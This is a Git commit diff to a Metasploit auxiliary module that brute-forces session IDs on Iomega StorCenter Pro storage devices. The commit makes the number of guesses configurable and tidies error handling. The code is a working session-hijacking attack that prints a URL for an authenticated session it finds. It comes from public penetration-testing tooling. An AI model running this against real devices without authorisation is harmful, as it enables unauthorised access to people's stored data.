Multiple fixes and improvements:

* Make session ID configurable based on feature #6894's suggestion. * Fix a potential bug when res is nil. * Use print_error() to make the error message more readable.
2012-05-24 02:16:29 -05:00 · 2012-05-24 02:16:29 -05:00 · c606896122
parent 5004515187
commit c606896122
1 changed files with 8 additions and 7 deletions
--- a/modules/auxiliary/admin/http/iomega_storcenterpro_sessionid.rb
+++ b/modules/auxiliary/admin/http/iomega_storcenterpro_sessionid.rb
@ -37,27 +37,28 @@ class Metasploit3 < Msf::Auxiliary
 		register_options(
 			[
 				Opt::RPORT(80),
+				OptInt.new('SID_MAX', [true, 'Maximum Session ID', 100])
 			], self.class)
 	end

 	def run
-		100.times do |x|
+		datastore['SID_MAX'].times do |x|
 			begin
-				print_status("Searching for a valid session ID.")
+				print_status("Trying session ID #{x.to_s}")

 				res = send_request_raw({
 					'uri'     => "/cgi-bin/makecgi-pro?job=show_home&session_id=#{x}",
-					'method'  => 'GET',
+					'method'  => 'GET'
 				}, 25)

-				if (res.to_s =~ /Log out/)
-					print_status("Found valid session ID number #{x}!")
-					print_status("Browse to http://#{rhost}:#{rport}/cgi-bin/makecgi-pro?job=show_home&session_id=#{x}")
+				if (res and res.to_s =~ /Log out/)
+					print_status("Found valid session ID number #{x.to_s}!")
+					print_status("Browse to http://#{rhost}:#{rport}/cgi-bin/makecgi-pro?job=show_home&session_id=#{x.to_s}")
 					break
 				end

 			rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-				print_status("Unable to connect to #{rhost}:#{rport}.")
+				print_error("Unable to connect to #{rhost}:#{rport}")
 				break
 			rescue ::Timeout::Error, ::Errno::EPIPE
 			end